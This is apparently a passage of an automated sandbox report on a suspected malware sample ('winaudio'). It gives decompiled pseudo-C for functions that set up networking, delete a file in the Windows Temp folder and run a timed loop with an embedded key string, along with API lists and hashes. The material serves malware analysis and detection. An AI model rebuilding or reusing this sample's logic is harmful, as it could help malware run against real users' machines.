                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                        • String ID:
                        • API String ID: 173952441-0
                        • Opcode ID: 3e8a2afa6cd700d2cd0159cf2fdee887e0174019d967c53816ddd2612e2a3623
                        • Instruction ID: 7a06c41a2f90f9208bf169c759acbc827da62fc689c7090bd976c7233015e3c3
                        • Opcode Fuzzy Hash: 3e8a2afa6cd700d2cd0159cf2fdee887e0174019d967c53816ddd2612e2a3623
                        • Instruction Fuzzy Hash: 6D01D232404308BBD7237B65DC09BAB7B6CDF81731F214799FA24861D0DB7188468760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D1DF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E002D1DF0(void* __ebx, char* __ecx, void* __edi, void* __eflags, char _a4, void* _a24) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v44;
				char _v48;
				char* _v52;
				intOrPtr _v56;
				void* __esi;
				void* __ebp;
				signed int _t24;
				signed int _t25;
				void* _t31;
				intOrPtr _t32;
				void* _t33;
				signed int _t35;
				signed int _t37;
				intOrPtr _t44;
				intOrPtr* _t46;
				char _t56;
				intOrPtr* _t63;
				void* _t67;
				intOrPtr* _t69;
				char* _t72;
				void* _t73;
				signed int _t74;

				_t52 = __ebx;
				_push(0xffffffff);
				_push(0x39c348);
				_push( *[fs:0x0]);
				_t24 =  *0x3e1008; // 0x847b54ee
				_t25 = _t24 ^ _t74;
				_v20 = _t25;
				_push(_t25);
				 *[fs:0x0] =  &_v16;
				_t72 = __ecx;
				_v52 = __ecx;
				_v56 = 0;
				_v8 = 0;
				_v48 = 0x3a;
				_t69 = 0x3dce2e;
				if(E002D0760( &_a4,  &_v48, 0, 1) != 0xffffffff) {
					E002D0490(__ebx,  &_a4, 0x3dce2e, E002D0280( &_a4,  &_v44, 0, _t28));
					E002D0420(__ebx,  &_v44, 0x3dce2e);
				}
				 *0x3f0830 = 0x7ff7;
				_t30 =  >=  ? _a4 :  &_a4;
				_t31 =  *0x39e238( >=  ? _a4 :  &_a4); // executed
				if(_t31 == 0) {
					_t32 =  *0x3eb4e8; // 0x6556
					_t33 = _t32 + 2;
					_t34 =  >  ? 0 : _t33;
					 *0x3eb4e8 =  >  ? 0 : _t33;
				} else {
					_t46 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc))));
					if(_t46 != 0) {
						_t69 =  *0x39e24c( *_t46);
					}
				}
				_t35 =  *0x3eb4f4; // 0x8
				_t56 = 0;
				 *((intOrPtr*)(_t72 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t72 + 0x10)) = 0;
				 *_t72 = 0;
				_t37 =  >  ? 0 : _t35 + 2;
				 *0x3eb4f4 = _t37;
				 *0x3f0830 = _t37 & 0x00000019 | 0x000000e0;
				if( *_t69 == 0) {
					L10:
					E002D0860(_t52, _t72, _t69);
					E002D0420(_t52,  &_a4, _t69, _t56);
					 *[fs:0x0] = _v16;
					_pop(_t73);
					return E002E056D(_v20 ^ _t74, _t67, _t73);
				} else {
					_t63 = _t69;
					_t19 = _t63 + 1; // 0x3dce2f
					_t67 = _t19;
					do {
						_t44 =  *_t63;
						_t63 = _t63 + 1;
					} while (_t44 != 0);
					_t56 = _t63 - _t67;
					goto L10;
				}
			}




























                        0x002d1df0
                        0x002d1df3
                        0x002d1df5
                        0x002d1e00
                        0x002d1e04
                        0x002d1e09
                        0x002d1e0b
                        0x002d1e10
                        0x002d1e14
                        0x002d1e1a
                        0x002d1e1c
                        0x002d1e1f
                        0x002d1e2d
                        0x002d1e38
                        0x002d1e3c
                        0x002d1e49
                        0x002d1e5e
                        0x002d1e66
                        0x002d1e66
                        0x002d1e72
                        0x002d1e7c
                        0x002d1e81
                        0x002d1e89
                        0x002d1ea0
                        0x002d1ea7
                        0x002d1eaf
                        0x002d1eb2
                        0x002d1e8b
                        0x002d1e8e
                        0x002d1e92
                        0x002d1e9c
                        0x002d1e9c
                        0x002d1e92
                        0x002d1eb7
                        0x002d1ebc
                        0x002d1ec1
                        0x002d1ecd
                        0x002d1ed0
                        0x002d1ed2
                        0x002d1ed5
                        0x002d1ee2
                        0x002d1ee9
                        0x002d1ef9
                        0x002d1efd
                        0x002d1f05
                        0x002d1f0f
                        0x002d1f18
                        0x002d1f26
                        0x002d1eeb
                        0x002d1eeb
                        0x002d1eed
                        0x002d1eed
                        0x002d1ef0
                        0x002d1ef0
                        0x002d1ef2
                        0x002d1ef3
                        0x002d1ef7
                        0x00000000
                        0x002d1ef7

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: gethostbynameinet_ntoa
                        • String ID: :
                        • API String ID: 2080845111-336475711
                        • Opcode ID: 115f52771e0dfcfdb4debbd21d23b23e70ace432048f60944bcbcd9eaa867482
                        • Instruction ID: 3ccca46aab04d5508ea7fd53857cab46a0cc7861d79a7682afcfb40a19904559
                        • Opcode Fuzzy Hash: 115f52771e0dfcfdb4debbd21d23b23e70ace432048f60944bcbcd9eaa867482
                        • Instruction Fuzzy Hash: 8D31D371A20144AFDB25DF28D881BAEBBECEB09310F04462AE845DB3D1DB749954CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DAB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E002DAB00(void* __ebx, intOrPtr* __ecx, void* __edi) {
				signed int _v8;
				char _v268;
				void* _v272;
				char _v276;
				void* __esi;
				signed int _t15;
				void* _t17;
				void* _t28;
				intOrPtr _t36;
				signed int _t47;
				void* _t48;

				_t15 =  *0x3e1008; // 0x847b54ee
				_v8 = _t15 ^ _t47;
				_t46 = __ecx;
				_v276 = 0;
				_v272 = 0;
				_t17 = E002DA510( &_v272,  &_v276); // executed
				if(_t17 != 0) {
					E0037E1A0(__edi,  &_v268, 0, 0x104);
					E002D5BF0( &_v272,  &_v268, 0x104, "C:\\Windows\\Temp\\%s", "5B7C84755D8041139A7AEBA6F4E5912F.dat");
					_t48 = _t48 + 0x1c;
					DeleteFileA( &_v268);
					goto L4;
				} else {
					_t28 = E002DA3B0(0,  &_v272,  &_v276, __edi, __ecx); // executed
					if(_t28 != 0) {
						L4:
						_t43 = _v272;
						_t36 =  *_v272;
						if(_t36 - 0x2711 <= 0xd8ec) {
							 *_t46 = _t36;
						}
						L00380508(_t43);
						return E002E056D(_v8 ^ _t47, _t43, _t46);
					} else {
						return E002E056D(_v8 ^ _t47,  &_v276, __ecx);
					}
				}
			}














                        0x002dab09
                        0x002dab10
                        0x002dab15
                        0x002dab17
                        0x002dab27
                        0x002dab39
                        0x002dab40
                        0x002dab77
                        0x002dab92
                        0x002dab97
                        0x002daba1
                        0x00000000
                        0x002dab42
                        0x002dab4e
                        0x002dab55
                        0x002daba7
                        0x002daba7
                        0x002dabad
                        0x002dabba
                        0x002dabbc
                        0x002dabbc
                        0x002dabc1
                        0x002dabda
                        0x002dab58
                        0x002dab68
                        0x002dab68
                        0x002dab55

                        APIs
                        Strings
                        • 5B7C84755D8041139A7AEBA6F4E5912F.dat, xrefs: 002DAB7C
                        • C:\Windows\Temp\%s, xrefs: 002DAB81
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: DeleteFile
                        • String ID: 5B7C84755D8041139A7AEBA6F4E5912F.dat$C:\Windows\Temp\%s
                        • API String ID: 4033686569-3814355176
                        • Opcode ID: 1efb1d4dce5c8b0a38fd5b9575fcc96d721459fd035ec454e91da447eacba34a
                        • Instruction ID: b33fca50c4330d78b72a21fa8df87dc03ac527fe07683ce91bfea6cc989e815e
                        • Opcode Fuzzy Hash: 1efb1d4dce5c8b0a38fd5b9575fcc96d721459fd035ec454e91da447eacba34a
                        • Instruction Fuzzy Hash: 5C11907095011C5ADB24EF54DC82BE9B368EF19304F8005D7E989A7281EBF55ED88F91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D34E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 42%
                        			E002D34E0(intOrPtr* __ecx, void* __edi) {
				signed int _v8;
				signed int _v16;
				char _v412;
				void* __esi;
				signed int _t8;
				signed int _t18;
				signed int _t20;
				void* _t25;
				void* _t27;
				void* _t29;
				signed int _t30;

				_t32 = (_t30 & 0xfffffff8) - 0x19c;
				_t8 =  *0x3e1008; // 0x847b54ee
				_v8 = _t8 ^ (_t30 & 0xfffffff8) - 0x0000019c;
				 *__ecx = 0x3dce9c;
				 *((char*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0xd)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *__ecx = 0x3dd4b0;
				E0037E1A0(__edi,  &_v412, 0, 0x190);
				 *0x39e268( &_v412, _t27);
				_t18 =  *0x3ebac0; // 0x0
				_t20 =  >  ? 0 : _t18 + 2;
				 *0x3ebac0 = _t20;
				 *0x3f0830 = _t20 & 0x00000019 | 0x000000e0;
				_t29 = 0x202;
				return E002E056D(_v16 ^ _t32 + 0x0000000c, _t25, _t29);
			}














                        0x002d34e6
                        0x002d34ec
                        0x002d34f3
                        0x002d3509
                        0x002d350f
                        0x002d3513
                        0x002d3517
                        0x002d351e
                        0x002d3524
                        0x002d3536
                        0x002d353c
                        0x002d354d
                        0x002d3552
                        0x002d3561
                        0x002d356e
                        0x002d3579

                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 002D3536
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Startup
                        • String ID: @!-$@!-
                        • API String ID: 724789610-3125570334
                        • Opcode ID: ba70d9e753aee9fc351d5663cf1ad79f06ad442e02d86db074c197a6e2ba77e7
                        • Instruction ID: 7e3924f5fd29f975f1645030415cba15fd844ea4c39702cc4187bb18efcaa4a5
                        • Opcode Fuzzy Hash: ba70d9e753aee9fc351d5663cf1ad79f06ad442e02d86db074c197a6e2ba77e7
                        • Instruction Fuzzy Hash: DF01DFB15103408BE326DF28EC667A6BBD8EB09314F444A2EE59ACB2D1D7B46444CBC6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00380FFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 34%
                        			E00380FFD(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				void* _t11;
				signed int _t18;
				void* _t24;
				void* _t26;
				void* _t30;
				intOrPtr* _t31;
				void* _t32;
				void* _t34;

				_t32 = __esi;
				_t30 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				_push(0x10);
				_push(0x3df5b0);
				E00398090(__ebx);
				_t31 =  *((intOrPtr*)(_t34 + 8));
				if(_t31 == 0) {
					_push(GetLastError());
					RtlExitUserThread();
				}
				 *((intOrPtr*)(E0038BD56(_t23, _t24, _t30) + 0x360)) = _t31;
				_t11 = E0038DF30(_t24, _t30, _t32);
				_t36 = _t11;
				if(_t11 != 0) {
					_t18 = E0038DE6F(_t24, _t36, 1);
					asm("sbb al, al");
					 *((char*)(_t31 + 0x10)) =  ~_t18 + 1;
				}
				 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
				 *0x39e280( *((intOrPtr*)(_t31 + 4))); // executed
				 *((intOrPtr*)( *_t31))(); // executed
				_pop(_t26);
				_push(0);
				E003811E7(_t26, _t30, _t31,  *_t31,  *(_t34 - 4));
				 *((intOrPtr*)(_t34 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 - 0x14))))));
				return E00383B03(_t23,  *((intOrPtr*)(_t34 - 0x14)), _t31,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 - 0x14)))))),  *((intOrPtr*)(_t34 - 0x14)));
			}











                        0x00380ffd
                        0x00380ffd
                        0x00380ffd
                        0x00380ffd
                        0x00380ffd
                        0x00380fff
                        0x00381004
                        0x00381009
                        0x0038100e
                        0x00381016
                        0x00381017
                        0x00381017
                        0x00381022
                        0x00381028
                        0x0038102d
                        0x0038102f
                        0x00381033
                        0x0038103a
                        0x0038103e
                        0x0038103e
                        0x00381041
                        0x0038104c
                        0x00381052
                        0x00381054
                        0x00381055
                        0x00381057
                        0x00381063
                        0x0038106f

                        APIs
                        • GetLastError.KERNEL32(003DF5B0,00000010), ref: 00381010
                        • RtlExitUserThread.NTDLL(00000000), ref: 00381017
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorExitLastThreadUser
                        • String ID: "-
                        • API String ID: 1750398979-106729161
                        • Opcode ID: 633bfd64517f67d62c6c0963e1034d01e6fa8d5180f7ac271df9d49693a4b993
                        • Instruction ID: ed0d72cbc859e4e934351266f6237497359845adf1879b16336d24d34b72b98e
                        • Opcode Fuzzy Hash: 633bfd64517f67d62c6c0963e1034d01e6fa8d5180f7ac271df9d49693a4b993
                        • Instruction Fuzzy Hash: E6F08C71600304AFDF07BFB0D84ABAC7768BF45701F11059AF5029B292DB766941DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DEEF0 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 373sleepCOMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E002DEEF0(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr __edi, void* __eflags) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed char _v44;
				intOrPtr _v48;
				char _v52;
				signed char _v68;
				char _v69;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				char _v108;
				void* __esi;
				void* __ebp;
				signed int _t106;
				signed int _t107;
				intOrPtr _t112;
				intOrPtr _t113;
				signed char _t118;
				signed char _t121;
				signed int _t122;
				signed int _t124;
				signed int _t137;
				void* _t138;
				signed int _t139;
				char* _t145;
				intOrPtr _t149;
				intOrPtr _t150;
				signed char _t153;
				signed char _t156;
				signed int _t164;
				signed int _t166;
				char* _t167;
				signed int _t172;
				void* _t173;
				signed int _t174;
				char* _t178;
				intOrPtr _t186;
				signed char _t195;
				intOrPtr* _t206;
				signed int _t208;
				void* _t209;
				signed int _t210;
				intOrPtr* _t212;
				intOrPtr* _t214;
				signed int _t222;
				void* _t223;
				void* _t225;
				signed int _t226;
				signed int _t227;
				void* _t228;
				void* _t229;
				intOrPtr* _t230;
				intOrPtr* _t231;
				intOrPtr* _t232;

				_t219 = __edi;
				_t218 = __edx;
				_push(0xffffffff);
				_push(0x39ce30);
				_push( *[fs:0x0]);
				_t229 = _t228 - 0x5c;
				_t106 =  *0x3e1008; // 0x847b54ee
				_t107 = _t106 ^ _t227;
				_v20 = _t107;
				_push(__ebx);
				_push(__edi);
				_push(_t107);
				 *[fs:0x0] =  &_v16;
				_t186 = __ecx;
				_v80 = __ecx;
				_t222 = 0x96;
				E002DE750(__ecx, __ecx, __edx, __edi);
				if( *((char*)(__ecx + 0xd)) != 0) {
					L78:
					 *[fs:0x0] = _v16;
					_pop(_t223);
					__eflags = _v20 ^ _t227;
					return E002E056D(_v20 ^ _t227, _t218, _t223);
				} else {
					while( *0x3f0835 == 0) {
						if(_t222 >= 0x96) {
							E002DEAB0(_t186, _t186, _t218, _t219); // executed
							_t222 = 0;
						}
						_v100 = _t222 + 1;
						_t225 = 0;
						while( *((char*)(_t186 + 0xd)) == 0 &&  *0x3f0835 == 0) {
							Sleep(0x64); // executed
							_t225 = _t225 + 1;
							if(_t225 < 0x3c) {
								continue;
							}
							break;
						}
						_v48 = 0xf;
						_v52 = 0;
						_v68 = 0;
						_v8 = 0;
						_v24 = 0xf;
						_v28 = 0;
						_v44 = 0;
						_v8 = 1;
						_t226 = E002DF570( &_v68);
						if(_t226 == 0 || _v52 <= 0) {
							L14:
							_v8 = 0;
							_t112 = _v24;
							if(_t112 < 0x10) {
								L22:
								_v8 = 0xffffffff;
								_t113 = _v48;
								_v44 = 0;
								_v28 = 0;
								_v24 = 0xf;
								if(_t113 < 0x10) {
									goto L75;
								}
								_t195 = _v68;
								if(_t113 + 1 < 0x1000) {
									L29:
									L002E05B1(_t195);
									_t229 = _t229 + 4;
									goto L75;
								}
								if((_t195 & 0x0000001f) != 0) {
									goto L77;
								}
								_t118 =  *(_t195 - 4);
								if(_t118 >= _t195) {
									goto L77;
								}
								_t195 = _t195 - _t118;
								if(_t195 < 4 || _t195 > 0x23) {
									goto L77;
								} else {
									_t195 = _t118;
									goto L29;
								}
							}
							_t195 = _v44;
							if(_t112 + 1 < 0x1000) {
								L21:
								L002E05B1(_t195);
								_t229 = _t229 + 4;
								goto L22;
							}
							if((_t195 & 0x0000001f) != 0) {
								goto L77;
							}
							_t121 =  *(_t195 - 4);
							if(_t121 >= _t195) {
								goto L77;
							}
							_t195 = _t195 - _t121;
							if(_t195 < 4 || _t195 > 0x23) {
								goto L77;
							} else {
								_t195 = _t121;
								goto L21;
							}
						} else {
							_t122 =  *0x3ebc44; // 0x6556
							_v76 = 0;
							_v84 = 0;
							_t124 =  >  ? 0 : _t122 + 2;
							 *0x3ebc44 = _t124;
							 *0x3f0830 = _t124 & 0x00000019 | 0x000000e0;
							E002DCBE0(0x3f09d8,  &_v108,  &_v68);
							_t131 = _v108 + 0x28;
							if( &_v44 != _v108 + 0x28) {
								_push(0xffffffff);
								_push(0);
								E002D0960(_t186,  &_v44, _t131);
							}
							if(_v28 >= 1) {
								_t219 =  *((intOrPtr*)(_t186 + 0x224));
								__eflags = _v48 - 0x10;
								_push(_t219);
								_t133 =  >=  ? _v68 :  &_v68;
								E003795D0(_t186,  >=  ? _v68 :  &_v68, _v52);
								__eflags = _v24 - 0x10;
								_push(_t219 + 1);
								_t201 =  >=  ? _v44 :  &_v44;
								E003795D0(_t186,  >=  ? _v44 :  &_v44, _v28);
								_t137 =  *0x3ebc04; // 0x6556
								_t138 = _t137 + 2;
								__eflags = _t138 - 0x1490;
								_t139 =  >  ? 0 : _t138;
								 *0x3ebc04 = _t139;
								 *0x3f0830 = _t139 & 0x00000019 | 0x000000e0;
								E00379270(_t186,  &_v76,  &_v84);
								_t205 = _v76;
								__eflags = _t205;
								if(_t205 == 0) {
									L55:
									_t230 = _t229 - 0x18;
									_t206 = _t230;
									 *((intOrPtr*)(_t206 + 0x14)) = 0xf;
									 *((intOrPtr*)(_t206 + 0x10)) = 0;
									__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t206 + 0x14)) < 0x10) {
										_t145 = _t206;
									} else {
										_t145 =  *_t206;
									}
									_push(0xffffffff);
									 *_t145 = 0;
									_push(0);
									E002D0960(_t186, _t206,  &_v68);
									E002DF3F0(_t186, _t226, _t218, _t219, __eflags);
									_v8 = 0;
									_t229 = _t230 + 0x18;
									_t149 = _v24;
									__eflags = _t149 - 0x10;
									if(_t149 < 0x10) {
										L66:
										_v8 = 0xffffffff;
										_t150 = _v48;
										_v24 = 0xf;
										_v28 = 0;
										_v44 = 0;
										__eflags = _t150 - 0x10;
										if(_t150 < 0x10) {
											L74:
											_t186 = _v80;
											L75:
											if( *((char*)(_t186 + 0xd)) != 0) {
												goto L78;
											}
											_t222 = _v100;
											continue;
										}
										_t195 = _v68;
										__eflags = _t150 + 1 - 0x1000;
										if(_t150 + 1 < 0x1000) {
											L73:
											L002E05B1(_t195);
											_t229 = _t229 + 4;
											goto L74;
										}
										__eflags = _t195 & 0x0000001f;
										if(__eflags != 0) {
											goto L77;
										}
										_t153 =  *(_t195 - 4);
										__eflags = _t153 - _t195;
										if(__eflags >= 0) {
											goto L77;
										}
										_t195 = _t195 - _t153;
										__eflags = _t195 - 4;
										if(__eflags < 0) {
											goto L77;
										}
										__eflags = _t195 - 0x23;
										if(__eflags > 0) {
											goto L77;
										}
										_t195 = _t153;
										goto L73;
									} else {
										_t195 = _v44;
										__eflags = _t149 + 1 - 0x1000;
										if(_t149 + 1 < 0x1000) {
											L65:
											L002E05B1(_t195);
											_t229 = _t229 + 4;
											goto L66;
										}
										__eflags = _t195 & 0x0000001f;
										if(__eflags != 0) {
											L77:
											E0037F981(_t186, _t195, _t219, __eflags);
											goto L78;
										}
										_t156 =  *(_t195 - 4);
										__eflags = _t156 - _t195;
										if(__eflags >= 0) {
											goto L77;
										}
										_t195 = _t195 - _t156;
										__eflags = _t195 - 4;
										if(__eflags < 0) {
											goto L77;
										}
										__eflags = _t195 - 0x23;
										if(__eflags > 0) {
											goto L77;
										}
										_t195 = _t156;
										goto L65;
									}
								}
								__eflags = _v84 - 1;
								if(_v84 < 1) {
									goto L55;
								}
								__eflags = _t226 - 1;
								if(_t226 >= 1) {
									_t186 = _v80;
									_t219 = 0;
									__eflags = 0;
									while(1) {
										__eflags =  *((char*)(_t186 + 0xd));
										if( *((char*)(_t186 + 0xd)) != 0) {
											break;
										}
										__eflags =  *0x3f0835;
										if( *0x3f0835 != 0) {
											break;
										}
										_v88 = 0;
										_v92 = 0;
										_t164 = E003794D0(_t186, _t205, _t218, _t219, _t186 + 0x18,  *(_t186 + 0x220) & 0x0000ffff, _t186 + 0x11c, _v76, _v84,  &_v88,  &_v92, "si-2n*8o_5brl-kq");
										_t229 = _t229 + 0x20;
										_v69 = _t164;
										__eflags = _t164;
										if(_t164 != 0) {
											_t226 = _t226 - 1;
											__eflags = _t226;
										}
										_t208 =  *0x3ebc58; // 0x6556
										_t209 = _t208 + 2;
										__eflags = _t209 - 0x1490;
										_t210 =  >  ? 0 : _t209;
										_t166 = _v88;
										 *0x3ebc58 = _t210;
										_t205 = _t210 & 0x00000019 | 0x000000e0;
										 *0x3f0830 = _t210 & 0x00000019 | 0x000000e0;
										__eflags = _t166;
										if(_t166 != 0) {
											__eflags = _v92;
											if(_v92 > 0) {
												L00380508(_t166);
												_t229 = _t229 + 4;
											}
										}
										_t219 = _t219 + 1;
										__eflags = _v69;
										if(_v69 == 0) {
											__eflags = _t219 - 0x64;
											if(_t219 >= 0x64) {
												_t232 = _t229 - 0x18;
												_t212 = _t232;
												 *((intOrPtr*)(_t212 + 0x14)) = 0xf;
												 *((intOrPtr*)(_t212 + 0x10)) = 0;
												__eflags =  *((intOrPtr*)(_t212 + 0x14)) - 0x10;
												if( *((intOrPtr*)(_t212 + 0x14)) < 0x10) {
													_t167 = _t212;
												} else {
													_t167 =  *_t212;
												}
												_push(0xffffffff);
												 *_t167 = 0;
												_push(0);
												E002D0960(_t186, _t212,  &_v68);
												E002DF3F0(_t186, _t226, _t218, _t219, __eflags);
												_t229 = _t232 + 0x18;
												break;
											}
											Sleep(0x32);
											__eflags = _t226;
											if(_t226 != 0) {
												continue;
											}
										}
										break;
									}
									_t157 = _v76;
									 *0x3f0830 = 0x7ff7;
									__eflags = _v76;
									if(__eflags != 0) {
										L00380508(_t157);
										_t229 = _t229 + 4;
									}
									goto L14;
								}
								_t172 =  *0x3ebc4c; // 0x6556
								_t218 = 0;
								_t173 = _t172 + 2;
								__eflags = _t173 - 0x1490;
								_t174 =  >  ? 0 : _t173;
								 *0x3ebc4c = _t174;
								 *0x3f0830 = _t174 & 0x00000019 | 0x000000e0;
								L00380508(_t205);
								_t231 = _t229 - 0x14;
								_t214 = _t231;
								 *((intOrPtr*)(_t214 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t214 + 0x10)) = 0;
								__eflags =  *((intOrPtr*)(_t214 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t214 + 0x14)) < 0x10) {
									_t178 = _t214;
								} else {
									_t178 =  *_t214;
								}
								 *_t178 = 0;
								E002D0960(_t186, _t214,  &_v68);
								_t57 = _t226 + 1; // 0x1
								E002DF3F0(_t186, _t57, _t218, _t219, __eflags);
								_t229 = _t231 + 0x18;
								E002D0420(_t186,  &_v44, _t219, 0);
								_v8 = 0xffffffff;
								E002D0420(_t186,  &_v68, _t219, 0xffffffff);
								goto L74;
							} else {
								goto L14;
							}
						}
					}
					goto L78;
				}
			}































































                        0x002deef0
                        0x002deef0
                        0x002deef3
                        0x002deef5
                        0x002def00
                        0x002def01
                        0x002def04
                        0x002def09
                        0x002def0b
                        0x002def0e
                        0x002def10
                        0x002def11
                        0x002def15
                        0x002def1b
                        0x002def1d
                        0x002def20
                        0x002def25
                        0x002def2e
                        0x002df3cf
                        0x002df3d2
                        0x002df3db
                        0x002df3e0
                        0x002df3ea
                        0x002def40
                        0x002def40
                        0x002def53
                        0x002def57
                        0x002def5c
                        0x002def5c
                        0x002def5f
                        0x002def62
                        0x002def64
                        0x002def75
                        0x002def7b
                        0x002def7f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002def7f
                        0x002def81
                        0x002def88
                        0x002def8f
                        0x002def93
                        0x002def9a
                        0x002defa1
                        0x002defa8
                        0x002defaf
                        0x002defb8
                        0x002defbc
                        0x002df021
                        0x002df021
                        0x002df025
                        0x002df02b
                        0x002df06b
                        0x002df06b
                        0x002df072
                        0x002df075
                        0x002df079
                        0x002df080
                        0x002df08a
                        0x00000000
                        0x00000000
                        0x002df090
                        0x002df099
                        0x002df0c5
                        0x002df0c6
                        0x002df0cb
                        0x00000000
                        0x002df0cb
                        0x002df09e
                        0x00000000
                        0x00000000
                        0x002df0a4
                        0x002df0a9
                        0x00000000
                        0x00000000
                        0x002df0af
                        0x002df0b4
                        0x00000000
                        0x002df0c3
                        0x002df0c3
                        0x00000000
                        0x002df0c3
                        0x002df0b4
                        0x002df02d
                        0x002df036
                        0x002df062
                        0x002df063
                        0x002df068
                        0x00000000
                        0x002df068
                        0x002df03b
                        0x00000000
                        0x00000000
                        0x002df041
                        0x002df046
                        0x00000000
                        0x00000000
                        0x002df04c
                        0x002df051
                        0x00000000
                        0x002df060
                        0x002df060
                        0x00000000
                        0x002df060
                        0x002defc4
